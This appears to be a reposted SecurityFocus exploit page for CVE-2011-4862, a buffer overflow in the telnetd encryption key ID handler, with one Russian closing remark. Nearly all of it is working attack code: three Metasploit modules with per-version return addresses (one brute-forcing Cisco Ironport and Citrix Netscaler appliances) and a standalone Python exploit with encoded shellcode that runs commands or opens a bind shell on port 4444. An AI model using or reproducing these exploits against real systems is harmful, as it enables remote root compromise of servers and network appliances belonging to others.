
http://www.securityfocus.com/bid/51182/exploit

Updated: Mar 30 2012 06:00AM


1------------------------------------------------------------------------------------------------------------------


#
# $Id: $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


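class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Telnet
  include Msf::Exploit::BruteTargets

  # Telnet ENCRYPT option (0x26, RFC 2946) suboptions used below.
  # IAC SB ENCRYPT IS DES_CFB64 <init data> IAC SE: ask the server to start
  # encryption negotiation, which is what reaches the vulnerable handler.
  # (The forum paste had a stray space in "\x18"; the bytes here are contiguous.)
  TELNET_ENC_INIT = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0".freeze
  # IAC SB ENCRYPT REPLY DES_CFB64: the server acknowledgement we wait for.
  TELNET_ENC_REPLY = "\xff\xfa\x26\x02\x01".freeze
  # IAC SB ENCRYPT ENC_KEYID: the key id that follows overflows the
  # handler's buffer (CVE-2011-4862).
  TELNET_ENC_KEYID = "\xff\xfa\x26\x07".freeze
  TELNET_END_SUBOPTION = "\xff\xf0".freeze
  # Upper bound on server messages read while waiting for the REPLY. Each
  # read already has a 5 second timeout; this caps a chatty server that never
  # acknowledges instead of looping on it as long as it keeps talking.
  MAX_REPLY_READS = 10

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in the encryption option handler of the
        FreeBSD telnet service.
      },
      'Author'         => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2011-4862'],
          ['OSVDB', '78020'],
          ['BID', '51182'],
          ['URL', 'http://www.exploit-db.com/exploits/18280/']
        ],
      'Privileged'     => true,
      'Platform'       => 'bsd',
      'Payload'        =>
        {
          'Space'    => 128,
          'BadChars' => "\x00",
        },
      # 'Ret' is the per-build address written over the function pointer;
      # the gadget type is noted next to each entry.
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx
          [ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx
          [ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx
          [ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx
          [ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx
          [ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx
          [ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx
          [ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx
          # [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)
          [ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return
          # Versions 5.2 and below do not support encryption
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 23 2011'))
  end

  # Run the overflow against one concrete target +t+ (a 'Targets' entry
  # carrying 'Ret'); BruteTargets calls this once per target when
  # 'Automatic' is selected.
  #
  # Two identical ENC_KEYID requests are sent: per the original author the
  # first one overwrites the pointer and the second one gets it called.
  # Raises RuntimeError when the server never answers the ENCRYPT
  # negotiation. The socket is released on every path, including the early
  # return and error paths (the original left it open there).
  def exploit_target(t)
    connect
    vprint_status(Rex::Text.to_hex_ascii(banner.to_s))

    begin
      sploit = TELNET_ENC_KEYID + build_key_id(t['Ret']) + TELNET_END_SUBOPTION

      # Initiate encryption and wait for the server to acknowledge it
      sock.put(TELNET_ENC_INIT)
      wait_for_encrypt_reply

      # The first request smashes the pointer
      print_status("Sending first payload")
      sock.put(sploit)

      # A silent server most likely means the wrong 'Ret' for this build:
      # do not fire the second request, move on to the next target
      unless sock.get_once(-1, 5)
        print_status("Server did not respond to first payload")
        return
      end

      # Some delay between each request seems necessary in some cases
      ::IO.select(nil, nil, nil, 0.5)

      # The second request results in the pointer being called
      print_status("Sending second payload...")
      sock.put(sploit)

      handler

      ::IO.select(nil, nil, nil, 0.5)
    ensure
      disconnect
    end
  end

  private

  # Build the 400-byte key id for return address +ret+. Layout (offsets in
  # the key id, before telnet escaping is undone by the server):
  #   0   : "\xeb\x76"  short jmp to offset 120
  #   72  : ret - 20    (original author's value; purpose not documented)
  #   76  : ret         the address from the target table
  #   80  : 112 filler bytes the author found can get mangled
  #   120 : "\xeb\x46"  short jmp to offset 192
  #   192 : the encoded payload
  def build_key_id(ret)
    # Telnet protocol requires 0xff (IAC) to be escaped with another 0xff
    penc = payload.encoded.gsub("\xff", "\xff\xff")

    key_id = Rex::Text.rand_text_alphanumeric(400)
    key_id[0, 2]  = "\xeb\x76"
    key_id[72, 4] = [ ret - 20 ].pack("V")
    key_id[76, 4] = [ ret ].pack("V")

    # Some of these bytes can get mangled, jump over them
    key_id[80, 112] = Rex::Text.rand_text_alphanumeric(112)

    # Bounce to the real payload (avoid corruption)
    key_id[120, 2] = "\xeb\x46"

    # The actual payload (slice assignment grows the string if the
    # escaped payload is longer than the remaining 208 bytes)
    key_id[192, penc.length] = penc
    key_id
  end

  # Read server messages until the ENCRYPT REPLY for DES_CFB64 shows up.
  # Raises RuntimeError when the server goes quiet (no encryption support,
  # same message as the original) or keeps talking without acknowledging.
  def wait_for_encrypt_reply
    MAX_REPLY_READS.times do
      data = begin
        sock.get_once(-1, 5)
      rescue ::StandardError
        nil # timeout / closed connection counts as "no answer"
      end
      raise RuntimeError, "This system does not support encryption" unless data
      return if data.index(TELNET_ENC_REPLY)
    end
    raise RuntimeError, "Server never acknowledged the encryption request"
  end

end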


2------------------------------------------------------------------------------------------------------------------



##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


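class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Brute

  # IAC SB ENCRYPT(0x26) IS DES_CFB64 <init data> IAC SE (RFC 2946), plus
  # the trailing NUL the original author sent (reason undocumented, kept).
  ENC_INIT_REQ = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0\x00".freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FreeBSD based telnetd encrypt_key_id brute force',
      'Description'    => %q{
        This module exploits a buffer overflow in the encryption option handler of the
        FreeBSD telnet service.
      },
      'Author'         => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
      'References'     =>
        [
          ['BID', '51182'],
          ['OSVDB', '78020'],
          ['CVE', '2011-4862'],
          ['URL', 'http://www.exploit-db.com/exploits/18280/']
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 128,
          'BadChars' => "\x00",
        },
      'Platform'       => [ 'bsd' ],
      # Each target is a 'Ret' range the Brute mixin walks in steps of 8,
      # calling brute_exploit once per candidate address.
      'Targets'        =>
        [
          #
          # specific targets
          #
          [ 'Cisco Ironport 7.x Bruteforce',
            {
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x0805cffd },
                  'Stop'  => { 'Ret' => 0x0805aa00 },
                  'Step'  => 8
                }
            }
          ],

          [ 'Citrix Netscaler 9.x',
            {
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x0805bffd },
                  'Stop'  => { 'Ret' => 0x08059000 },
                  'Step'  => 8
                }
            }
          ],

          [ 'Other FreeBSD based targets',
            {
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x0805fffd },
                  'Stop'  => { 'Ret' => 0x08050000 },
                  'Step'  => 8
                }
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 23 2011'))

    register_options(
      [
        Opt::RPORT(23),
      ], self.class)
  end

  # Brute mixin callback: one attempt with the candidate return address in
  # addrs['Ret']. The same request is sent twice (the original author's
  # first-smashes / second-calls sequence), then the socket is released and
  # the payload handler is started.
  #
  # Network errors (refused, reset, timeout) are reported and the socket is
  # released so the address sweep continues; the original's bare `rescue`
  # swallowed them silently, which hides a down host for the whole sweep,
  # and leaked the socket.
  def brute_exploit(addrs)
    curr_ret = addrs['Ret']
    addr = "0x%.8x" % curr_ret
    begin
      connect

      sock.get_once
      print_status('Initiate encryption mode ...')
      sock.put(ENC_INIT_REQ)
      sock.get_once

      print_status("Trying return address #{addr}...")
      print_status('Sending first payload ...')
      req = build_keyid_request(curr_ret)
      sock.put(req)
      sock.get_once

      print_status('Sending second payload ...')
      sock.put(req)
    rescue ::StandardError => e
      print_error("#{addr}: #{e.class}: #{e.message}")
      return
    ensure
      disconnect
    end

    handler
  end

  private

  # Build the ENC_KEYID suboption for return address +ret+:
  # IAC SB ENCRYPT ENC_KEYID, a NUL, 71 NOPs, ret twice (little endian),
  # 128 NOPs, the telnet-escaped payload, four 0x90, IAC SE and a trailing
  # NUL. Byte layout is exactly the original author's.
  #
  # NOTE(review): only the payload is IAC-escaped; if make_nops ever emits
  # 0xff the telnet layer will misparse the suboption. Confirm the NOP
  # generator used for this platform before relying on that.
  def build_keyid_request(ret)
    # Telnet protocol requires 0xff (IAC) to be escaped with another 0xff
    penc = payload.encoded.gsub("\xff", "\xff\xff")

    req = ''
    req << "\xff\xfa\x26\x07"
    req << "\x00"
    req << make_nops(71)
    req << [ret].pack('V')
    req << [ret].pack('V')
    req << make_nops(128)
    req << penc
    req << "\x90\x90\x90\x90"
    req << "\xff\xf0"
    req << "\x00"
    req
  end

end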

3------------------------------------------------------------------------------------------------------------------


##
# $Id: $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


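class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Telnet
  include Msf::Exploit::BruteTargets

  # Telnet ENCRYPT option (0x26, RFC 2946) suboptions used below.
  # IAC SB ENCRYPT IS DES_CFB64 <init data> IAC SE: start the encryption
  # negotiation that reaches the vulnerable handler.
  # (The forum paste had a stray space in "\x18"; the bytes here are contiguous.)
  TELNET_ENC_INIT = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0".freeze
  # IAC SB ENCRYPT REPLY DES_CFB64: the server acknowledgement we wait for.
  TELNET_ENC_REPLY = "\xff\xfa\x26\x02\x01".freeze
  # IAC SB ENCRYPT ENC_KEYID: the key id that follows overflows the
  # handler's buffer (CVE-2011-4862).
  TELNET_ENC_KEYID = "\xff\xfa\x26\x07".freeze
  TELNET_END_SUBOPTION = "\xff\xf0".freeze
  # Upper bound on server messages read while waiting for the REPLY; each
  # read has its own 5 second timeout, so this caps a chatty server that
  # never acknowledges instead of looping on it as long as it keeps talking.
  MAX_REPLY_READS = 10

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in the encryption option handler of the
        Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions
        use NetKit-derived telnet daemons, so this flaw only applies to a small subset of
        Linux systems running telnetd.
      },
      'Author'         => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2011-4862'],
          ['OSVDB', '78020'],
          ['BID', '51182'],
          ['URL', 'http://www.exploit-db.com/exploits/18280/']
        ],
      'Privileged'     => true,
      'Platform'       => 'linux',
      'Payload'        =>
        {
          'Space'       => 200,
          'BadChars'    => "\x00",
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 23 2011'))
  end

  # Run the overflow against one concrete target +t+ (a 'Targets' entry
  # carrying 'Ret'); BruteTargets calls this once per target when
  # 'Automatic' is selected.
  #
  # Two identical ENC_KEYID requests are sent: per the original author the
  # first one overwrites the pointer and the second one gets it called.
  # Raises RuntimeError when the server never answers the ENCRYPT
  # negotiation. The socket is released on every path, including the early
  # return and error paths (the original left it open there).
  def exploit_target(t)
    connect
    # same as the original's print_status(...) if datastore['VERBOSE']
    vprint_status(Rex::Text.to_hex_ascii(banner.to_s))

    begin
      sploit = TELNET_ENC_KEYID + build_key_id(t['Ret']) + TELNET_END_SUBOPTION

      # Initiate encryption and wait for the server to acknowledge it
      sock.put(TELNET_ENC_INIT)
      wait_for_encrypt_reply

      # The first request smashes the pointer
      print_status("Sending first payload")
      sock.put(sploit)

      # A silent server most likely means the wrong 'Ret' for this build:
      # do not fire the second request, move on to the next target
      unless sock.get_once(-1, 5)
        print_status("Server did not respond to first payload")
        return
      end

      # Some delay between each request seems necessary in some cases
      ::IO.select(nil, nil, nil, 0.5)

      # The second request results in the pointer being called
      print_status("Sending second payload...")
      sock.put(sploit)
      handler

      ::IO.select(nil, nil, nil, 0.5)
    ensure
      disconnect
    end
  end

  private

  # Build the 400-byte key id for return address +ret+. Layout (offsets in
  # the key id):
  #   0   : "\xeb\x76"  short jmp to offset 120
  #   72  : ret - 20    (original author's value; purpose not documented)
  #   76  : ret         the address from the target table
  #   80  : 40 x 0x41   bytes the author found can get mangled
  #   120 : the encoded payload (NOPs disabled in 'Payload')
  def build_key_id(ret)
    # Telnet protocol requires 0xff (IAC) to be escaped with another 0xff
    penc = payload.encoded.gsub("\xff", "\xff\xff")

    key_id = Rex::Text.rand_text_alphanumeric(400)
    key_id[0, 2]  = "\xeb\x76"
    key_id[72, 4] = [ ret - 20 ].pack("V")
    key_id[76, 4] = [ ret ].pack("V")

    # Some of these bytes can get mangled, jump over them
    key_id[80, 40] = "\x41" * 40

    # Insert the real payload (slice assignment grows the string if the
    # escaped payload is longer than the remaining 280 bytes)
    key_id[120, penc.length] = penc
    key_id
  end

  # Read server messages until the ENCRYPT REPLY for DES_CFB64 shows up.
  # Raises RuntimeError when the server goes quiet (no encryption support,
  # same message as the original) or keeps talking without acknowledging.
  def wait_for_encrypt_reply
    MAX_REPLY_READS.times do
      data = begin
        sock.get_once(-1, 5)
      rescue ::StandardError
        nil # timeout / closed connection counts as "no answer"
      end
      raise RuntimeError, "This system does not support encryption" unless data
      return if data.index(TELNET_ENC_REPLY)
    end
    raise RuntimeError, "Server never acknowledged the encryption request"
  end

end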

4------------------------------------------------------------------------------------------------------------------


#!/usr/bin/env python
# Checks/exploits CVE-2011-4862 (remote root in encryption supporting telnetd) in multiple FreeBSD versions.
# Author: Knull of http://leethack.info
# References:
# Metasploit module, http://www.metasploit.com/modules/exploit/freebsd/telnet/telnet_encrypt_keyid
# FreeBSD advisory, http://lists.freebsd.org/pipermail/freebsd-announce/2011-December/001398.html

import random, string, struct, socket, time, sys

def usage():
    """Print the command line help to stdout; returns nothing."""
    print("Usage: " + sys.argv[0] + " [Option] host\n\nOptions: \n -c\tcheck if telnetd is vulnerable and running as root (runs command `id` on host)\n -e\texploit host (opens a bindshell on port 4444)\n")

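# Command line: "<script> -c host" checks (runs `id` through the exploit),
# "<script> -e host" pops a bind shell. Anything else prints the usage and
# exits non-zero (the original exited 0 on a usage error).
# The shellcode strings below are the original ones with the forum's
# line-wrap spaces removed ("\ x2b", "\x6 d" ...), which made them either
# wrong bytes or invalid \x escapes; the length asserts guard against that.
if len(sys.argv) == 3:
    host = sys.argv[2].rstrip()
    port = 23
    if sys.argv[1] == '-c':
        # slightly modified version of metasploits bsd/x86/exec:
        #
        # bsd/x86/exec - 71 bytes
        # http://www.metasploit.com
        # Encoder: x86/shikata_ga_nai
        # AppendExit=false, CMD=id, PrependSetresuid=false,
        # PrependSetuid=false, VERBOSE=false, PrependSetreuid=false
        buf = ("\xda\xd0\xb8\x7b\x91\x45\xc5\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1\x0c"
               "\x31\x45\x17\x03\x45\x17\x83\x96\x6d\xa7\x30\x02\xb5\x70\x22\x80"
               "\xa1\xad\x37\x24\x32\x27\x50\x76\x5a\x59\xb0\x05\xf2\xcd\xe1\xc6"
               "\x60\x67\x77\xfb\x37\x9f\x84\xfb\xb7\x5f\xe2\x9f\xb7\x08\xa7\xd6"
               "\x59\xe4\x16\xbb\xc9\xc4\x19")
        assert len(buf) == 71
    elif sys.argv[1] == '-e':
        # slightly modified version of metasploits bsd/x86/shell_bind_tcp:
        #
        # bsd/x86/shell_bind_tcp - 100 bytes
        # http://www.metasploit.com
        # Encoder: x86/shikata_ga_nai
        # AutoRunScript=, AppendExit=false, PrependSetresuid=false,
        # InitialAutoRunScript=, PrependSetuid=false, LPORT=4444,
        # VERBOSE=false, RHOST=, PrependSetreuid=false
        buf = ("\xda\xc8\xbe\x7b\xd4\xea\x14\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x13"
               "\x31\x70\x18\x83\xc0\x04\x03\x70\x6f\x36\x1f\x25\x4f\xe6\x88\xb9"
               "\x4d\x16\x15\xcf\xb6\x48\xcf\xce\x52\x6b\x65\xc1\x12\x0a\xb4\x61"
               "\x05\x9d\x16\x08\xc1\x45\x5a\x4c\x98\x31\x88\xfd\xf0\x70\xd0\x4e"
               "\x1a\x46\x51\xfe\x72\x32\x08\xa7\xbf\x42\x53\x18\xdb\x3a\x5a\xf7"
               "\x4b\x92\x8d\x8b\xe3\x84\xfe\x09\x9a\x3a\x88\x2d\x0c\x97\xd9\xe1"
               "\x1c\x2c\x13\x81")
        assert len(buf) == 100
    else:
        usage()
        sys.exit(1)
else:
    usage()
    sys.exit(1)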


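socket.setdefaulttimeout(10)
# OS-backed RNG for the filler bytes (no global seeding to worry about)
rg = random.SystemRandom()
# ascii_letters is locale independent; string.letters[0:52] was not
alnum = string.ascii_letters + string.digits


def rand_alnumlst(length):
    """Return a list of `length` random alphanumeric one-character strings.

    A list rather than a str so callers can patch fields in with slice
    assignment before joining it back into the wire buffer.
    """
    return [rg.choice(alnum) for _ in range(length)]


# Telnet ENCRYPT option (0x26, RFC 2946) suboptions:
#   IAC SB ENCRYPT IS DES_CFB64 <init data> IAC SE  - start negotiation
#   IAC SB ENCRYPT ENC_KEYID                        - the overflowing suboption
# (the forum paste had a stray space in "\x18"; bytes here are contiguous)
enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
enc_keyid = "\xff\xfa\x26\x07"
end_suboption = "\xff\xf0"

# ret values for multiple FreeBSD versions (same table as the Metasploit
# module referenced in the header); rets[i] belongs to version[i]
rets = (0x0804a8a9, 0x0804a889, 0x0804a869, 0x08057bd0, 0x0804c4e0,
        0x0804a5b4, 0x08052925, 0x0804cf31, 0x8059730)
version = ('8.2', '8.1', '8.0', '7.3/7.4', '7.0/7.1/7.2',
           '6.3/6.4', '6.0/6.1/6.2', '5.5', '5.3')
assert len(rets) == len(version)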

# display banner
print("Vulnerability checker/exploit for CVE-2011-4862 (FreeBSD telnetd encryption)")
print("by Knull, http://leethack.info\n")

# count: index into `version` for the current ret;
# tried: set once an -e payload pair was delivered (reported after the sweep)
count = 0
tried = 0

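# loop through the ret's until one works
for ret, ver in zip(rets, version):

    # Key id layout (mirrors the Metasploit module referenced above):
    #   0   : "\xeb\x76" short jmp to offset 120
    #   72  : ret - 20
    #   76  : ret
    #   80  : 112 filler bytes that may get mangled
    #   120 : "\xeb\x46" short jmp to offset 192
    #   192 : shellcode
    # The slice bounds are exact, so each field replaces as many bytes as it
    # holds and the key id stays 400 bytes like the reference module; the
    # original's short slices ([0:1], [72:75] ...) grew the list by one byte
    # per assignment.
    key_id = rand_alnumlst(400)
    key_id[0:2] = "\xeb\x76"
    key_id[72:76] = struct.pack('<I', ret - 20)
    key_id[76:80] = struct.pack('<I', ret)
    key_id[80:192] = rand_alnumlst(112)
    key_id[120:122] = "\xeb\x46"
    key_id[192:192 + len(buf)] = buf

    sploit = enc_keyid + ''.join(key_id) + end_suboption

    print("Trying FreeBSD " + ver + "...\n")

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, port))
        # sendall: plain send() may deliver only part of the buffer
        sock.sendall(enc_init)
        data = sock.recv(32)

        # first request smashes the pointer
        sock.sendall(sploit)
        data = sock.recv(32)
        time.sleep(0.5)

        # only fire the second request (the one that gets the pointer
        # called) if the server still answered after the first
        if data:
            sock.sendall(sploit)
            time.sleep(0.5)

            if sys.argv[1] == '-e':
                tried = 1
            elif sys.argv[1] == '-c':
                # the exec payload runs `id`; its output comes back on
                # the telnet connection
                result = sock.recv(128)
                if "root" in result:
                    print(host + " is vulnerable, result of command: id\n" + result)
                    sys.exit()
    except socket.error as e:
        # refused / reset / timeout: say so instead of silently moving on
        # (a down host used to look exactly like a non-vulnerable one)
        print("  socket error for FreeBSD " + ver + ": " + str(e) + "\n")
    finally:
        sock.close()

if tried:
    print("Sent payloads, check bindshell on " + host + ", port 4444\n")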
В который раз убеждаюсь, что securityfocus надо смотреть постоянно, даже если название уязвимости кажется знакомым до боли, т.к. иногда таки проскакивает update
